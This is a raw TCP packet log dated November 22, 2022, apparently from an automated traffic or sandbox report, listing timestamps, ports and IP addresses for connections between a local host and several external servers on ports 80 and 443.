                                                                                Nov 22, 2022 05:09:15.191349983 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.191389084 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.191407919 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.191450119 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.191488981 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.191529989 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.191633940 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.191673994 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.191816092 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.191858053 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.191925049 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.191965103 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.192009926 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.192023039 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.192128897 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.192168951 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.192210913 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.192301035 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.192370892 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.192452908 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.192496061 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.192619085 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.192738056 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.192799091 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.192893028 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.192991972 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193051100 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.193104982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193146944 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193192959 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193205118 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.193244934 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193284988 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193331957 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193344116 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.193453074 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193528891 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193583012 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.193639040 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193736076 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193814039 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193856955 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.193913937 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.193990946 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.194195986 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.194267035 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.194308996 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.195004940 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.195045948 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.195065022 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.229772091 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.229825020 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.229855061 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.229888916 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:15.230005026 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:15.232148886 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:16.799036026 CET4917680192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:16.884813070 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:16.884905100 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:16.978421926 CET804917634.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:16.978528023 CET4917680192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:16.979897022 CET4917680192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:16.979967117 CET4917680192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:17.157687902 CET804917634.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:17.157744884 CET804917634.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:17.433695078 CET804917634.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:17.636806965 CET4917680192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:18.441456079 CET4917680192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:38.393585920 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:38.394017935 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:38.394017935 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:38.572127104 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:10:01.415256023 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:10:01.697233915 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:01.929205894 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:10:02.553270102 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:10:03.801354885 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:10:06.282008886 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:10:08.808896065 CET49177443192.168.2.223.232.242.170
                                                                                Nov 22, 2022 05:10:08.808969021 CET443491773.232.242.170192.168.2.22
                                                                                Nov 22, 2022 05:10:08.809061050 CET49177443192.168.2.223.232.242.170
                                                                                Nov 22, 2022 05:10:08.816739082 CET49177443192.168.2.223.232.242.170
                                                                                Nov 22, 2022 05:10:08.816798925 CET443491773.232.242.170192.168.2.22
                                                                                Nov 22, 2022 05:10:09.136703014 CET443491773.232.242.170192.168.2.22
                                                                                Nov 22, 2022 05:10:09.136859894 CET49177443192.168.2.223.232.242.170
                                                                                Nov 22, 2022 05:10:09.148613930 CET49177443192.168.2.223.232.242.170
                                                                                Nov 22, 2022 05:10:09.148657084 CET443491773.232.242.170192.168.2.22
                                                                                Nov 22, 2022 05:10:09.149080038 CET443491773.232.242.170192.168.2.22
                                                                                Nov 22, 2022 05:10:09.354918003 CET443491773.232.242.170192.168.2.22
                                                                                Nov 22, 2022 05:10:09.355125904 CET49177443192.168.2.223.232.242.170
                                                                                Nov 22, 2022 05:10:11.305624962 CET4917180192.168.2.22192.227.132.49
                                                                                Nov 22, 2022 05:10:16.673042059 CET49177443192.168.2.223.232.242.170
                                                                                Nov 22, 2022 05:10:16.673106909 CET443491773.232.242.170192.168.2.22
                                                                                Nov 22, 2022 05:10:16.748177052 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:16.819546938 CET443491773.232.242.170192.168.2.22
                                                                                Nov 22, 2022 05:10:16.819750071 CET443491773.232.242.170192.168.2.22
                                                                                Nov 22, 2022 05:10:16.819972038 CET49177443192.168.2.223.232.242.170
                                                                                Nov 22, 2022 05:10:16.823260069 CET49177443192.168.2.223.232.242.170
                                                                                Nov 22, 2022 05:10:16.902165890 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:16.902265072 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:16.902812004 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.057444096 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.058321953 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.058372021 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.058443069 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.058501005 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.058543921 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.058618069 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.058666945 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.058708906 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.058756113 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.058787107 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.058937073 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.058979034 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.058993101 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.059019089 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.059065104 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.214607954 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.214673996 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.214714050 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.214732885 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.214756012 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.214795113 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.214806080 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.214958906 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.215002060 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.215003967 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.215132952 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.215178967 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.215276003 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.215317965 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.215367079 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.215444088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.215605021 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.215646029 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.215653896 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.215684891 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.215727091 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.215792894 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.371258974 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.371365070 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.371366024 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.371442080 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.371483088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.371485949 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.371522903 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.371563911 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.371566057 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.371752977 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.371793985 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.371795893 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.371833086 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.371874094 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.372083902 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.372128963 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.372172117 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.372172117 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.372498989 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.372541904 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.372545004 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.372580051 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.372620106 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.372628927 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.372658968 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.372698069 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.372766018 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.372806072 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.372843027 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.372845888 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.526545048 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.526587963 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.526614904 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.526632071 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.526642084 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.526752949 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.526791096 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.526864052 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.526906013 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.526947021 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.527002096 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.527033091 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.527215958 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.527245998 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.527252913 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.527308941 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.527358055 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.527509928 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.527539015 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.527580023 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.527616024 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.527642965 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.527698040 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.527698994 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.527888060 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.527916908 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.527945042 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.528090954 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.528129101 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.528215885 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.528251886 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.528287888 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.528331995 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.528359890 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.528489113 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.528527021 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.528559923 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.528659105 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.528697014 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.528707027 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.528805971 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.529289007 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.529998064 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.680844069 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.680901051 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.680917025 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.680927992 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.681068897 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.681087971 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.681169033 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.681271076 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.681288004 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.681328058 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.681365013 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.681381941 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.681413889 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.681479931 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.681655884 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.681674004 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.681737900 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.681785107 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.681973934 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.681993008 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.682049036 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.682096004 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.682223082 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.682244062 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.682301998 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.682382107 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.682399988 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.682446957 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.682471991 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.682477951 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.682543993 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.682657957 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.682674885 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.682739973 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.682826042 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.682842970 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.682915926 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.682959080 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.683017969 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.683083057 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.683105946 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.683197021 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.683259964 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.683310986 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.683430910 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.683449984 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.683500051 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.683592081 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.683609962 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.683670998 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.683809042 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.683826923 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.683888912 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.683971882 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.683989048 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.684050083 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.684318066 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.684339046 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.684355021 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.684412956 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.684654951 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.684672117 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.684726954 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.686772108 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.835443974 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.835508108 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.835547924 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.835550070 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.835587978 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.835628986 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.835674047 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.835782051 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.835823059 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.835906982 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.835917950 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.835947990 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.835988045 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.836029053 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.836087942 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.836272001 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.836335897 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.836378098 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.836386919 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.836457968 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.836509943 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.836626053 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.836663961 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.836889982 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.836934090 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.836937904 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.836975098 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.837016106 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.837057114 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.837059975 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.837212086 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.837254047 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.837299109 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.837379932 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.837501049 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.837620974 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.837662935 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.837667942 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.840755939 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.840900898 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.840941906 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.840969086 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.841063976 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.841105938 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.841150999 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.841244936 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.841286898 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.841435909 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.841475964 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.841483116 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.841568947 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.841609955 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.841655970 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:17.841793060 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.841835022 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.841975927 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:17.842016935 CET8049178183.78.168.24192.168.2.22
